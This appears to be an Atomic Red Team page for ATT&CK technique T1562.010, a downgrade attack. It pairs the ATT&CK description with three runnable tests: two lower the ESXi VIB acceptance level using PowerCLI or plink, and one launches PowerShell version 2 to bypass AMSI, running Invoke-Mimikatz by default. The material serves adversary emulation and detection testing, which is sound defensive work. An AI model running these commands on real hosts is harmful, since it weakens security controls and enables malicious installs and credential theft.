Try it using Invoke-Atomic

Impair Defenses: Downgrade Attack

Description from ATT&CK

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

Adversaries may downgrade and use various less-secure versions of features of a system, such as Command and Scripting Interpreters or even network protocols that can be abused to enable Adversary-in-the-Middle or Network Sniffing.(Citation: Praetorian TLS Downgrade Attack 2014) For example, PowerShell versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to Impair Defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)

Atomic Tests

Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI

An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference

Supported Platforms: linux

auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091

Inputs:

Name Description Type Default Value
vm_host Specify the host name of the ESXi Server string atomic.local
vm_user Specify the privilege user account on ESXi Server string root
vm_pass Specify the privilege user password on ESXi Server string pass

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
Disconnect-VIServer -Confirm:$false

Dependencies: Run with powershell!

Description: Check if VMWARE PowerCLI PowerShell Module is installed.

Check Prereq Commands:

1
2
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}

Get Prereq Commands:

1
Install-Module -Name VMware.PowerCLI -Confirm:$false

Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI

An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference

Supported Platforms: linux

auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616

Inputs:

Name Description Type Default Value
vm_host Specify the host name of the ESXi Server string atomic.local
vm_user Specify the privilege user account on ESXi Server string root
vm_pass Specify the privilege user password on ESXi Server string pass
plink_file Path to plink path PathToAtomicsFolder..\ExternalPayloads\plink.exe
cli_script Path to script with commands to change acceptance level path PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt

Attack Commands: Run with command_prompt!

1
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

Dependencies: Run with powershell!

Description: Check if plink is available.

Check Prereq Commands:

1
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}

Get Prereq Commands:

1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"

Atomic Test #3 - PowerShell Version 2 Downgrade

Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.

Supported Platforms: windows

auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f

Inputs:

Name Description Type Default Value
v2_command Specify the command to execute with Version 2 string Invoke-Mimikatz

Attack Commands: Run with powershell!

1
PowerShell -version 2 -command '#{v2_command}'

Dependencies: Run with powershell!

Description: Check if Version 2 is installed. Check Prereq Commands:

1
2
$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
if (-not $v2_installed) {exit 1} else {exit 0}

Get Prereq Commands:

1
echo "Manually install PowerShell Version 2"

source